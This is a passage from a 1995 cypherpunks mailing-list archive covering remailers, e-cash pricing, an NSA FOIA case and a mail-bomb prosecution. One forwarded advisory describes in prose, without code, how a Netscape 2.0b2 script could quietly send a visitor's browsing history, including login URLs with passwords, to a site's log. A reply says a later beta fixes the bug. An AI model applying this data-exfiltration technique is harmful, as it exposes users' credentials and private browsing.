derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Johnson <bobj1968@ns.cencom.net>
Date: Mon, 4 Dec 95 22:09:14 PST
To: cypherpunks@toad.com
Subject: Crypto stuff
Message-ID: <30C3FCA9.9CB@cencom.net>
MIME-Version: 1.0
Content-Type: text/plain


Could you send me some info on crypto stuff. I need to secure some files 
and as yet haven't figured out how to do it. If you can help I would 
appreciate it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 5 Dec 95 00:16:13 PST
To: cypherpunks@toad.com
Subject: Re: Tricky Netscape Security Hole
In-Reply-To: <199512050729.AAA28538@mailhost1.primenet.com>
Message-ID: <30C3FEE5.71C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Thaddeus Ozone, by way of carolann@censored.org Censored Girls Anonymous wrote:
> 
> Yes it's full of headers, but it's the complete, unexpurgated version.
> If this theory is correct, this IS FAR WORSE THAN A 40 bit key.
> 
> I saw the livescript on the source code.
> I use 1.22 for image stability right now, though.
> 
> Yes it's a came from, a came from, a came from kinda deal,
> but in the interest of security brevity it "seems real enough" to me.

  Didn't you see this discussed here last week?  This is a bug in Beta 2.
It has since been fixed, and the now available Beta 3 of Netscape 2.0
has the fix.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drozone@winternet.com (Thaddeus Ozone) (by way of carolann@censored.org (Censored Girls Anonymous))
Date: Mon, 4 Dec 95 23:27:59 PST
To: cypherpunks@toad.com
Subject: Tricky Netscape Security Hole
Message-ID: <199512050729.AAA28538@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes it's full of headers, but it's the complete, unexpurgated version.
If this theory is correct, this IS FAR WORSE THAN A 40 bit key.

I saw the livescript on the source code.
I use 1.22 for image stability right now, though.

Yes it's a came from, a came from, a came from kinda deal,
but in the interest of security brevity it "seems real enough" to me.

Love Always,

Carol Anne

>Posted-Date: Mon, 4 Dec 1995 12:57:21 -0600
>X-Sender: jeff@cyborganic.com
>Mime-Version: 1.0
>Date: Mon, 4 Dec 1995 10:51:56 -0700
>To: cybernauts-l@netcom.com
>From: foodie@netcom.com (We're a Comglomerate) (by way of jeff@cyborganic.com
> (Jeffrey Logsdon))
>Subject: Tricky Netscape Security Hole
>
>Anybody else see this happening?
>
>Eternal Vigilance, and all that.
>
>- ------- Start of forwarded message -------
>>From: Scott Weston <scott@tripleg.com.au>
>>Subject: Netscape 2.0b2 allows for invasion of privacy
>>Newsgroups: aus.net.announce,comp.privacy
>>Date: Fri, 01 Dec 1995 11:09:06 +1100
>
>Hi 'Net Dwellers,
>
>First off - I've posted this before (however not to this group) and only
>got a response from the Netscape Corp.  They were glad I found the
>problem and said that they would fix it, however I feel that people
>should know about it.  Also I would like people to help me spread this
>document around, i.e. if you know of a newsgroup (or people) that would
>find this interesting then please re-post it.
>
>On with the problem...
>
>I've recently got hold of the latest netscape, and was (at first) very
>excited about the new "LiveScripts" that it supports.  If people don't
>yet know - these "LiveScripts" allow you to put small programs into your
>web page that is then executed by the Netscape client.  There is no
>DIRECT way for these programs to send information back to the owner of
>the web page, however I was able to do it in a not-so-direct way.
>
>The "LiveScript" that I wrote extracts ALL the history of the current
>netscape window.  By history I mean ALL the pages that you have visited
>to get to my page, it then generates a string of these and forces the
>Netscape client to load a URL that is a CGI script with the QUERY_STRING
>set to the users History.  The CGI script then adds this information
>to a log file.  Now if this hasn't quite CLICKED yet let's do a little
>example.
>
>Johnny Mnemonic starts up his newly acquired version of Netscape2.0b2
>to start his daily "surf" session.  First he decides to check his CD-NOW
>purchase and uses the handy Auto-Login URL.  Then he decides to go to
>Lycos and do a search.  In his search he find my page, which he decides
>to visit.  Suddenly he is transported, not to my main page but to one
>of my CGI scripts, which in turn happens to have ALL the URL's he just
>been to in it.  This means that in my log will be:
>
>  - the URL to use to get into CD-NOW as Johnny Mnemonic, including
>    username and password.
>  - The exact search params he used on Lycos (i.e. exactly what he
>    searched for)
>  - plus any other places he happened to visit.
>
>I do this in a way that the user will KNOW that it has happened and
>will _hopefully_ email Netscape and tell them they are NOT impressed.
>But it would be EASY for me to change the CGI script so that the user
>is unaware that it has actually happened, unless they closely examine
>their URL history (in fact they'll probably just think it's a netscape
>bug).
>
>
>If you're skeptical about this then do the test yourself.  Get netscape
>2.0b2 and do some normal surfing, and then go to Lycos.  Do a search for:
>
>  scotts car boot sale
>
>which should return the URL - http://www.tripleg.com.au/staff/scott
>
>Click on the URL and sit back and watch.  First my main page will show up
>but a little while later you should be transported to a CGI bin script
>that will show you your URL history.
>
>I have tested this with both the Linux 2.0b2, and Solaris 2.0b2 versions
>and both have done the same thing.  I would be interested in knowing if
>it happens for ALL versions of Netscape2.0b2.  The log file does log
>the User Agent (i.e. the name of the platform you are using) so by simply
>going to the page I will know that your version of Netscape is also
>open to this form of attack.
>
>Currently I can find no way to configure Netscape2.0b2 to NOT run
>LiveScripts - and at the very least this option should be quickly
>added to the next version of netscape to be released.  But a far
>better solution (IMHO) would be for netscape to pop up a window before
>running the LiveScript and let you know what the LiveScript wants access
>to, e.g. if it only wants to print out the current time then that's
>OK, but if it wants to read my history list and then transport me to
>a CGI script and add me to a logfile then maybe I would say NO.
>
>I think I've said enough....
>
>If you've got any further questions, or want some more information just
>email me : scott@tripleg.com.au
>
>- --
>Scott.
>
>Quote from a car accident insurance claim: "I told the police that I was
>not injured, but on removing my hat, I found that I had a skull fracture."
>- ------- End of forwarded message -------
>
>
>------------------------------

------------------------------------------------------------
Thaddeus "Doc" Ozone    <http://www.winternet.com/~drozone/>
          "Specialization is for insects."   -RAH
  "I yam what I yam and that's all what I yam!"   -Popeye







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 5 Dec 95 00:05:02 PST
To: cypherpunks@toad.com
Subject: No Privacy Right on "My" Desktop ?
Message-ID: <Pine.BSD.3.91.951205025944.29416B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
A 12 04 95 The Electronic Telegraph newsstory headlined 
 
            'Spoilsport' software bars games 
 
reports that 
 
   An American company called DVD has developed a utility
   called UnGame that can delete up to 3,100 games from a
   computer network.  Even if the game is hidden on the
   computer user's own hard disk, it will find it.
 
 
The user's own hard disk? 
 
   Although the machines at work usually belong to the company,
   most employees regard them as an electronic equivalent of
   their desk, and are similarly territorial.
 
 
John Davison, PC Zone editor, says: 
 
   If anyone stole something from your desk you'd be fed up.
   If anybody stole something from my computer, I'd be equally
   disgusted.
 
 
What kind of software is UnGame? 
 
The newsstory suggests the answer: 
 
   ...industry experts have complained that companies may 
   be releasing "tailored viruses".... 
 
 
I believe my first post to the list was about McAfee's Virus 
Blocker.  Perhaps that can be...adapted. 
 
If so, those who then declared the information had nothing 
to do with privacy may continue playing their games. 
 
Of course companies may try another tack: Oracle's "internet 
terminal." 
 
As dlv@bwalk.dm.com pointed out in his 11 18 95 post, 
 
 [I guess, they mean no permanent storage or software other 
 than the browser in ROM. No remembered state, no viruses 
 ... -DV] 
 
 
In "my" terminal. 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  The Electronic Telegraph's website URL is: 
 
       http://www.telegraph.co.uk 
 
       The newsstory's online filename is: 
 
       ngame02.htm 

       It was written by: 
 
       ROBERT UHLIG, TECHNOLOGY CORRESPONDENT
 
       It first appeared in 12 03 95 The Daily Telegraph. 
 
       The McAfee website URL is: 
 
       http://www.mcafee.com
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Tue, 5 Dec 95 03:44:38 PST
To: cypherpunks, tien@toad.com, gnu
Subject: SF NSA FOIA appeal hearing canceled on the 6th.  Go to San Jose!
In-Reply-To: <9511231746.AA16675@toad.com>
Message-ID: <9512051144.AA27252@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> At 9AM on December 6 in San Francisco, the 9th District Court of Appeals
> will finally hear the appeal of my original FOIA case against NSA.

Wrong!  The three Court of Appeals judges who were selected to review
my case have decided that there is no need for "oral argument" (a
hearing).  They will simply decide based on the written briefs that
they got a year ago when we did the appeal.  This probably means we'll
get a decision sooner rather than later, but we don't know how it will
come out.

Sorry for the false alarm.  I just found out last week.

So, you can feel free to go to Roger Schlafly's crypto patent validity
case in San Jose instead.  I'll repeat the info he provided, below.

	John Gilmore

> On Wed., Dec. 6, 1995, 10:00 am, San Jose Federal Bldg, there will
> be a hearing on the validity of the Diffie-Hellman, Hellman-Merkle,
> RSA, and Schnorr patents.
> 
> There are also some annoying procedural technicalities that are
> also scheduled to be heard, so we may not get to the patents
> right away.  (antitrust standing, sufficiency of pleadings,
> admissibility of evidence, etc.)
> 
> Details:
> Schlafly v. Public Key Partners & RSA Data Security
> Case C-94-20512 SW PVT
> Hon. Spencer Williams
> At the San Jose federal building, 280 S First St.
> Ask the US Marshals where Williams' courtroom is while you go thru
> the airport-style security.
> Court Clerk: 408/535-5364
> 
> The Federal Bldg is in downtown San Jose, between 101, 880, and 280.
> I will take 280 to SJ, go north on 87, right on the first exit, and
> park in the first convenient lot or garage.  There is some street
> parking, but the SJ meter maids are very efficient.  If you come
> from the north, you may want to take 87 or the Almaden Expwy.  (I get
> those mixed up.)
> 
> The judge is used to lawyers wearing suits, so try to wear something
> that won't appear disrespectful.
> 
> Roger Schlafly
> 
> phone: 408-476-3550
> CompuServe: 76646,323
> US Mail: PO Box 1680, Soquel, CA 95073 USA
> Internet: rschlafly@attmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 5 Dec 95 03:40:26 PST
To: cypherpunks@toad.com
Subject: The "Future" Fallacy
Message-ID: <2.2b8.32.19951205114442.0085d9d4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Gates (like Mister Newt before him) committed what I call the Future
Fallacy in "The Road Ahead."  Page 106.

"Soon any child old enough to use a computer will be able to transmit coded
messages that no government on earth will find easy to decipher."

DCF

"Term limits aren't enough.  We need jail." -- PJ





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wwwziff@internet.com (ZD Net / World Wide Web Edition)
Date: Tue, 5 Dec 95 07:32:27 PST
To: wwwedition@ziff.com
Subject: ZD Net Update v.1 #2
Message-ID: <199512051533.KAA11909@yipee.internet.com>
MIME-Version: 1.0
Content-Type: text/plain



__________________________________ZD Net Update_______________________________
v. 1 #3                                                               11-27-95

Welcome to ZD Net Update, the free E-mail newsletter created especially for
registered users of Ziff-Davis Interactive's ZD Net/World Wide Web edition.
ZD Net Update is a bi-weekly bulletin that alerts you to new and exciting
developments on ZD Net.

In this issue:

> COMPUTER LIFE ONLINE PRESENTS THE HOT SITE OF THE DAY
> INTRODUCING Q&A WITH PC MAGAZINE'S MICHAEL MILLER
> ZD INTERNET LIFE INVITES YOU TO BECOME A WEB REVIEWER
> MACUSER ANNOUNCES 11TH ANNUAL EDITORS' CHOICE FINALISTS

*     *     *     *     *     *     *     *     *     *

COMPUTER LIFE ONLINE PRESENTS THE HOT SITE OF THE DAY

The editors at Computer Life Online surf the Net like a bad habit. When
they find sites that are hot, fresh, interesting--or just relevant to a
healthy computer life--they share the news with everyone here on the Web.
Then, before the Site of the Day gets warm, they put it on the "Previously
Featured Hot Sites" page and serve up another one. Check these out, and you
may be on your way to developing a few bad Net habits of your own:

     http://www.zdnet.com/~complife/filters/site.html

*     *     *     *     *     *     *     *     *     *

INTRODUCING Q&A WITH PC MAGAZINE'S MICHAEL MILLER

PC Magazine Online (http://www.zdnet.com/~pcmag/) is now giving their readers
the opportunity to ask PC Magazine's editor-in-chief, Michael Miller, frank
questions regarding the ever-changing state of the computer industry. Every
week, this new column will feature questions from readers about a given topic.
You can send questions as well as suggestions for topics you'd like to see
Miller address in future columns.

As Miller puts it: "My print column is really an essay on a particular topic.
I try to focus on a broad variety of things, although most my print columns
have been Internet-related lately. That's not too much of a surprise, as I've
been spending a lot of time working with new tools and content for the
Internet. This column will be more conversational. It will give me an
opportunity to answer reader questions and address their concerns. In
addition, this Q&A will be more timely than my magazine column because it
doesn't have to be printed, bound, and mailed."

Among Miller's first topics: PC Magazine's 1995 Technical Excellence Awards
and reflections on the recent Comdex show.

*     *     *     *     *     *     *     *     *     *

ZD INTERNET LIFE INVITES YOU TO BECOME A WEB REVIEWER

ZD Internet Life (http://www.zdnet.com/zdil/), the first interactive magazine
designed from the ground up around a Web site, wants you to become part of
their Web review team. Now you can tell the world what you really think of a
Web site. Check out the new "Rate-o-Matic" review tool

     http://www.zdnet.com/zdil/cgi-bin/review.cgi

and see for yourself. Every review enters you in a monthly drawing, and the
most astute comments may be included in ZDIL's database.

Need some help finding the sites you'd like to review? ZDIL's great new Search
capability will give you a lift:

     http://www.zdnet.com/zdil/cgi-bin/index.pl

*     *     *     *     *     *     *     *     *     *

MACUSER ANNOUNCES 11TH ANNUAL EDITORS' CHOICE FINALISTS

What were the hottest Mac products this year? Find out by perusing MacUser,
which has announced the finalists for this year's Editors' Choice Awards:

     http://www.zdnet.com/~macuser/eddy95/

But that's just the beginning of the story. You are also invited to join the
staff on Monday, December 4, when MacUser's Eddy Web Site celebrates its grand
opening. This state-of-the-art Web site will feature downloadable product
demos, downloadable QuickTime video, RealAudio commentary from editors, links
to product reviews published in MacUser, and the 1995 Eddy Awards Sweepstakes.

Winners will be announced on Sunday, December 17 in a live ceremony on America
Online (Keyword: Eddy95). Information about all the winners will appear on the
Eddy Web Site the following day.

*     *     *     *     *     *     *     *     *     *

ZD Net Update is the official newsletter of ZD Net/World Wide Web Edition. It
is compiled by Tom Schmidt (tom_schmidt@zd.com). Feel free to respond with any
news, notes, comments, or suggestions. To unsubscribe to ZD Net Update, point
your browser to:

     http://www.zdnet.com/cgi-bin/ziffmail.pl/update

and select

     "Unsubscribe to ZD Net Update."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Tue, 5 Dec 95 04:29:01 PST
To: cypherpunks@toad.com
Subject: another fbi prosecution
Message-ID: <951205073038.60202194@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



 The Chronicle of Higher Education (Dec 8, 1995) page A21 reports that
 Monmouth University (West Long Branch, New Jersey; http://www.monmouth.edu) 
 sophomore Dominick LaScala was charged last week in federal court with two 
 counts of computer fraud.
 
 Dominick had his campus account taken away after other users complained
 that he had been "advertising business proposals inappropriately on line."
 The FBI alleges that he then sent 24,000 email messages in one day from a
 commercial account (unnamed) to Monmouth's system. This denial of service
 attack was successful for about 5 hours. He is facing six (6) years in prison
 and up to $350,000 in fines (1.20 years/hr and $70,000/hr).
   
 His lawyer (Kenneth Weiner) claims that "even if his client sent the mail 
 bomb" since no damage was done to the system, he could not be convicted 
 under the computer fraud statute. He also claims that prosecutors are trying 
 to make an example of his client. The university is still trying to figure 
 out whether he can be punished under the university code of conduct.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Strawser <bstrawse@copper.ucs.indiana.edu>
Date: Tue, 5 Dec 95 06:06:15 PST
To: cypherpunks@toad.com
Subject: [Mix-L] WARNING: sting via remailer! (fwd)
Message-ID: <199512051407.JAA18236@copper.ucs.indiana.edu>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
> From owner-mix-l@alpha.jpunix.com  Tue Dec  5 09:03:10 1995
> Date: Tue, 5 Dec 1995 07:55:21 -0600 (CST)
> Message-Id: <199512051355.HAA12202@alpha.jpunix.com>
> To: mix-l@vishnu.alias.net, remailer-operators@c2.org,
>         mail2news@utopia.hacktic.nl
> Newsgroups: alt.privacy, alt.privacy.anon-server, alt.security
> From: "Mr. Boffo" <mixmaster@vishnu.alias.net>
> X-Comment1: This message did not originate from the
> X-Comment2: above address. It was automatically remailed
> X-Comment3: by an anonymous mail service. Please report
> X-Comment4: problems or inappropriate use to
> X-Comment5: <complaints@vishnu.alias.net>
> Subject: [Mix-L] WARNING: sting via remailer!
> Sender: owner-mix-l@jpunix.com
> Precedence: bulk
> 
> 	I was in the federal building coffee shop in Reston, Va. yesterday
> when I overheard a conversation between what appeared to be two FBI agents
> discussing a sting operation involving Mixmaster. Hearing the word
> "mixmaster" naturally caused my ears to perk up and I listened further. 
> 
> 	It appears that the FBI has coerced a mixmaster remailer operator
> into cooperating with them in a sting operation to catch remailers when
> they forward email pertaining to pornography, pedophilia, and copy-written
> software. 
> 
> 	My questions are a) is it possible to perform this type of
> monitoring on a mixmaster remailer and, b) what is the identity of the
> cooperating remailer operator? 
> 
> 	This concerns me greatly as I use remailers to privatize my
> important email regularly and I don't want my identity or my email
> compromised because of a "spook in cypherpunks clothing".
> 


-- 
Bryan Strawser, Indiana University, Bloomington, USA              Remember Waco
bstrawse@indiana.edu                    http://copper.ucs.indiana.edu/~bstrawse



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 5 Dec 95 06:08:56 PST
To: rah@shipwright.com (Robert Hettinga)
Subject: Geodesic Payment Systems?  (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment)
In-Reply-To: <v02120d09ace90e1bce3b@[199.0.65.105]>
Message-ID: <gkl58I2Mc50eBlRA1y@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.nonpersonal: 4-Dec-95 Re: Meeting notes from ANSI..
Robert Hettinga@shipwrig (4665*)

> MTB's
> cost on a Digicash trade is $.50, while the most efficient book-entry
> system on the net, First Virtual, has to charge, what? $5.00 to break even?

There are some interesting unspoken assumptions here.  To calculate
anyone's "cost" on a transaction requires the complex amortization of
costs over many transactions, with assumptions/projections about the
transaction volume.  I have no idea where you came by either of your
numbers, MTB's or FV's, but I can tell you that your guess about FV is
off the mark.  And I'm sure that MTB is no more eager than we are to
publicly dissect all the underlying cost structures, so I have no idea
what the 50 cents that you cite really means.

From a consumer standpoint, I think that the only reasonable thing you
can do is to assume that the vendors are pricing their services at a
level that they believe yields profit in the long term.  FV charges 29
cents plus 2 percent, which means that you can put 50 cent charges
through the system if you're willing to give up 30 of those cents.  By
pricing it that way, we have invited people to put 50 cent charges
through the system.  We wouldn't have done that if we didn't think we
could make money on it.  

To be perfectly clear:  our minimum service charge is 30 cents, not 5
dollars.  If we didn't think it was worthwhile to take transactions that
small, we wouldn't do so.

Finally, on the more philosophical matter:

> They don't get it. The network isn't a hierarchy. The network is a
> geodesic. You don't need offsetting book entries, you can trade digital
> certificates much cheaper. You don't need to control your software, you
> need to make it autonomous and set it free.

In terms of crypto-privacy, anonymous communication, and things like
that, I agree completely.  However, it's genuinely more complicated than
that where money is concerned, because there are aspects of the
translation between "bits and bucks" that have some extremely serious
practical complexities.

A true geodesic structure is self-supporting and self-structuring.  A
cryptographic infrastructure can and should be similar, I agree
completely.  However, a *monetary* infrastructure needs convertibility,
and the points of conversion are always the best targets of attack for
criminals.  (I've been casting about for an analogy to physical
geodesics, and it's hard to find one.  The best I can come up with is to
imagine that in order to convert a carbon buckyball to a more
conventional set of carbon molecules, you had to do it through a service
bureau that was capable of error, fraud, or subversion by outside
criminals.  This would ONLY matter if you ever wanted to do such
conversions, but it would matter a lot then, especially if you had to
suffer a serious financial loss if you got the wrong carbon molecules at
the end of the process.)

IF you wanted to settle for a totally non-convertible economy (like
rubles in the old Soviet Union, or like the LETS system on the net
today, as I understand it) then you could build it geodesically.  But if
you want to be able to convert back and forth between Internet payment
systems and non-Internet payment systems, it can never be truly
geodesic.  It will always be attackable at the points of conversion. 
(You may "trade digital certificates", but how do you know the ones
you're receiving were obtained for legitimate real-world value?) 
Because of this, the underwriting financial institutions, who have a
very reasonable desire to limit their own risk, will inevitably seek the
protection-by-traceability offered by something less than perfect
anonymity.  We may not like it, but it's a very natural position to be
taken by those who are actually bearing the financial risks at the point
of conversion.

The truth is that there's a natural tension between the consumer's
desire for privacy and the underwriter's desire for financial
protection.  First Virtual has been worrying about this for 2 years now,
actually.  Our solution -- which I think has held up pretty well -- was
to allow users to be pseudonymous (as opposed to anonymous), to limit
the traceability-by-pseudonym to the service bureau (FV) that effects
the payments, and to treat all such information with the highest
possible standards of confidentiality.  The fact that the information
can be traced when absolutely necessary is actually a huge selling point
with those who carry the financial risks.  I'm not claiming it's a
perfect solution, but I think that unless you are clear about the
underlying tradeoffs, it's hard to talk seriously about how to build a
better solution.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gondolin Mixmaster Remailer <mix@remail.gondolin.org>
Date: Tue, 5 Dec 95 06:34:00 PST
To: cypherpunks@toad.com
Subject: gondolin.org remailer announcement
Message-ID: <199512051421.JAA02528@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text/plain



Gondolin Technologies is proud to announce our resumption of remailer 
services to the online community.  Some of you may remember the remailer 
services based at <mixmaster@gondolin.org> that were on-line for most of
this year.

We are now back and better than ever with highly improved hardware and 
net connections.

We are hosting a Type I "Cypherpunks" remailer, as well as a Type II 
"Mixmaster" remailer at <mix@remail.gondolin.org>.  The PGP public key 
for the type I remailer is below:


The Type II remailer supports posting via mail2news gateways.  We are 
using Mixmaster 2.0.3 from Lance Cottrell.

The Type I remailer supports PGP encryption, latent time, hash marks, 
cutmarks, and so on.  Our type I software is John Fleming's Freedom 
Remailer v1.6beta.

Our remailers also utilize a reordering pool.

Address any comments, complaints, or concerns to 
<remailer-admin@gondolin.org>.

- Bryan Strawser, System/Network Administrator, Gondolin Technologies







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Tue, 5 Dec 95 06:30:56 PST
To: cypherpunks@toad.com
Subject: Re: WARNING: sting via remailer!
In-Reply-To: <199512051355.HAA12202@alpha.jpunix.com>
Message-ID: <m0tMyPa-000G3cC@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


[ I see that the original has been forwarded to cypherpunks, so I'll
  also send my response there. -russ ]

Boffo writes:
 > 	I was in the federal building coffee shop in Reston, Va. yesterday
 > when I overheard a conversation between what appeared to be two FBI agents
 > discussing a sting operation involving Mixmaster. Hearing the word
 > "mixmaster" naturally caused my ears to perk up and I listened further. 
 > 
 > 	It appears that the FBI has coerced a mixmaster remailer operator
 > into cooperating with them in a sting operation to catch remailers when
 > they forward email pertaining to pornography, pedophilia, and copy-written
 > software. 

Uh-oh!  I'd better shut down my remailer, but fast, based on an
unsubstantiated rumor.  Especially one that makes little sense.  Why
do you need a sting?  All you have to do is use a single remailer, and
send the mail from yourself, to yourself.  You know the source,
destination, and who handled it.  IF a court can be convinced that
forwarding email containing illegal materials is the same as asking to
receive email containing illegal materials, then ALL of our butts are
toast.

 > 	My questions are a) is it possible to perform this type of
 > monitoring on a mixmaster remailer and, b) what is the identity of the
 > cooperating remailer operator? 
 > 
 > 	This concerns me greatly as I use remailers to privatize my
 > important email regularly and I don't want my identity or my email
 > compromised because of a "spook in cypherpunks clothing".

You fool.  If you use remailers regularly, then YOU ARE KNOWN TO THE
SPOOKS.  Face facts.  We know that the FBI spends a minimum of
$10,000,000 each year (count the wiretaps, multiply by agents and do
the math) just for telephone wiretaps.  Computer wiretaps are a LOT
CHEAPER.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | Flushing, NY.  Not just a suburb,
Potsdam, NY 13676 | +1 315 268 9201 FAX   | it's a good idea in general.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Tue, 5 Dec 95 06:56:41 PST
To: cypherpunks@toad.com
Subject: Geodesic Payment Systems?  (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment)
In-Reply-To: <v02120d09ace90e1bce3b@[199.0.65.105]>
Message-ID: <m0tMyoZ-000G3fC@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel Borenstein writes:

 > A true geodesic structure is self-supporting and self-structuring.  A
 > cryptographic infrastructure can and should be similar, I agree
 > completely.  However, a *monetary* infrastructure needs convertibility,
 > and the points of conversion are always the best targets of attack for
 > criminals.

Ah!  You mean the criminals seeking to exploit the conversion, not
criminals using the anonymity of the system for income secrecy.  I got
a little confused right there.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | Flushing, NY.  Not just a suburb,
Potsdam, NY 13676 | +1 315 268 9201 FAX   | it's a good idea in general.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Tue, 5 Dec 95 08:03:12 PST
To: cypherpunks@toad.com
Subject: Re: Globally legal Netscape
In-Reply-To: <9512032146.AA07279@all.net>
Message-ID: <199512051606.KAA05672@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


rthomas@pamd.cig.mot.com (Robert Owen Thomas) said:

ROT> look, this is just a *bit* extreme.  having been one of those folks
ROT> sworn to uphold the Constitution, i can tell all of you that there
ROT> is no master plan to rid the American people of their rights and
ROT> freedom.

	Oh, I'm glad that a senior advisor to the President of the
United States is reading this list.

ROT> regards, --robert, a former U.S. government employee...but i won't
ROT> say where...;-) --

	Oh, so you _aren't_ a senior advisor?  I didn't think I had ever
heard your name mentioned in any press reports.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 5 Dec 95 07:20:38 PST
To: dave.turner@wmc.ac.uk (Dave Turner)
Subject: Re: Joining The Mailing List
In-Reply-To: <"mailhub.live:260730:951205123724"@liverpool.ac.uk>
Message-ID: <199512051525.KAA27932@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dave Turner wrote:
| Cypherpunks,
| Would it be possible to include me on your current mailing list.

	Would journalists *please* stop writing about
cypherpunks@toad.com, and start including the majordomo@toad.com
address?

Thanks.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Dec 95 10:09:00 PST
To: cypherpunks@toad.com
Subject: Do companies ever do the "right thing"?
Message-ID: <ace9c8a002021004befb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:18 PM 12/4/95, Ed Carp wrote:

>> That's always a tough position to be in.  If Netscape or Microsoft
>> knew what was the "right" thing to do, I don't doubt that they'd be
>> doing it.
>
>That's one of the most politically and socially naive statements I've
>ever heard.  Corporations *never* do the "right thing" unless it will
>increase their profits.  Remember, corporations are in business to
>make money by providing a product or service that people will pay
>money for.  Whatever gets in the way of that will fall by the
>wayside.  That's an economic fact of life.

I can think of many cases where companies chose courses of actions that
seemed to be motivated by choices about what is right and what is wrong.

Viewing the "profit landscape," corporations have to balance movement to
the "locally most profitable" regions (fertile valleys) or to movement
further out into even more profitable regions.

It is just not the case that all corporations make decisions about what is
the "most profitable," at any cost. They have Boards of Directors with
influence, and they have various sorts of "mission statements."

This applies to small businesses as well, where the owners often make
decisions about which markets to compete in based on their own personal
moral choices. Vegetarian restaurants, for example, choose not to offer
meat, even when market studies indicate their patronship would probably
increase.

I also know of electronics companies that, for various reasons, refuse to
bid on government contracts. (Partly they fear sinking into a bureaucratic
mess, partly they don't want to do military work.)

Finally, many companies understand the value of "good will" (as we discuss
so often in talking about reputations) and think carefully about how their
actions will be perceived _long into the future_.

It is the belief, I think, of most of us that Netscape will have its
reputation diminished if it acquiesces without a strong fight to government
plans for GAK. In this sense, if we are right, Netscape's longterm profits
may be affected by their choice.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 5 Dec 95 08:47:12 PST
To: blancw@accessone.com
Subject: Re: Info on Netscape's key escrow position
Message-ID: <Pine.BSD.3.91.951205114509.3942B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Blanc, 
 
 
On 12 02 95 you pointed to: 
 
   ...an underlying problem, which is of not having a sense 
   of freedom to stand up to the Dark Side. 
 
 
You have put your finger on perhaps THE problem: Why did 
we cast aside our sense of freedom?  How may we re-ignite 
the spirit of freedom? 
 
I believe excerpts from a newsstory in today's Electronic 
